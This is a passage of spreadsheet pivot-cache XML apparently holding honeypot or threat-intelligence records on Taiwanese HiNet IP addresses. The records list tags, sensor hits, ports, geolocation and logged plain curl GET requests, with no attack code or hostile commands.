    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7a75:5d1a"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3744"/>
    <x v="3744"/>
    <s v="NA&amp;&amp;220-134-135-153.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T15:15:32"/>
    <d v="2024-09-09T23:44:00"/>
    <d v="2025-04-01T15:15:32"/>
    <n v="436"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;35526&amp;&amp;9100"/>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GET&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:8799"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3745"/>
    <x v="3745"/>
    <s v="114-34-85-73.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T15:14:18"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T15:14:18"/>
    <n v="314"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H43&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_MT-CPA_H43"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;26467&amp;&amp;23&amp;&amp;62609&amp;&amp;NA&amp;&amp;9100&amp;&amp;43822&amp;&amp;80"/>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NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7222:5549"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3746"/>
    <x v="3746"/>
    <s v="NA&amp;&amp;114-34-110-57.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T15:13:20"/>
    <d v="2024-09-02T00:34:00"/>
    <d v="2025-04-01T15:13:20"/>
    <n v="5630"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;39292&amp;&amp;13248&amp;&amp;23&amp;&amp;9100"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7222:6e39"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3747"/>
    <x v="3747"/>
    <s v="220-133-82-198.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T15:13:19"/>
    <d v="2024-12-16T02:56:00"/>
    <d v="2025-04-01T15:13:19"/>
    <n v="475"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23&amp;&amp;9100"/>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
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dc85:52c6"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3748"/>
    <x v="3748"/>
    <s v="NA&amp;&amp;220-135-126-118.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T15:13:14"/>
    <d v="2024-12-15T06:48:27"/>
    <d v="2025-04-01T15:13:14"/>
    <n v="179"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H13"/>
    <s v="23&amp;&amp;80&amp;&amp;NA&amp;&amp;41161&amp;&amp;51835&amp;&amp;51871&amp;&amp;51889&amp;&amp;51827&amp;&amp;51899&amp;&amp;9100"/>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GET&amp;&amp;NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:7e76"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3749"/>
    <x v="3749"/>
    <s v="NA&amp;&amp;125-228-50-215.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T15:01:44"/>
    <d v="2024-12-16T14:34:52"/>
    <d v="2025-04-01T15:01:44"/>
    <n v="384"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H6"/>
    <s v="23&amp;&amp;65308&amp;&amp;80&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL: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7de4:32d7"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3750"/>
    <x v="3750"/>
    <s v="114-33-80-80.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T14:43:42"/>
    <d v="2024-09-11T17:32:00"/>
    <d v="2025-04-01T14:43:42"/>
    <n v="277"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;23&amp;&amp;80&amp;&amp;9100"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7221:5050"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3751"/>
    <x v="3751"/>
    <s v="NA&amp;&amp;220-133-196-95.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T14:38:24"/>
    <d v="2024-04-07T13:19:00"/>
    <d v="2025-04-01T14:38:24"/>
    <n v="1087"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H7&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;63347&amp;&amp;23&amp;&amp;61677&amp;&amp;41840&amp;&amp;41882&amp;&amp;33674&amp;&amp;9100&amp;&amp;NA&amp;&amp;53686&amp;&amp;40578&amp;&amp;80&amp;&amp;24018"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="HoneyPot BlackListed IP"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:c45f"/>
    <s v="C-I_D"/>
    <s v="medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3752"/>
    <x v="3752"/>
    <s v="125-228-34-140.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T14:34:04"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T14:34:04"/>
    <n v="371"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_DNS_H11&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23&amp;&amp;53&amp;&amp;34903&amp;&amp;80&amp;&amp;35441&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:228c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3753"/>
    <x v="3753"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T14:33:46"/>
    <d v="2025-04-01T14:33:46"/>
    <d v="2025-04-01T14:33:46"/>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b:e976"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3754"/>
    <x v="3754"/>
    <s v="220-133-134-26.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T14:25:47"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T14:25:47"/>
    <n v="504"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H37&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;60439&amp;&amp;23&amp;&amp;30871&amp;&amp;43718&amp;&amp;9100&amp;&amp;80&amp;&amp;55901&amp;&amp;38183"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;login"/>
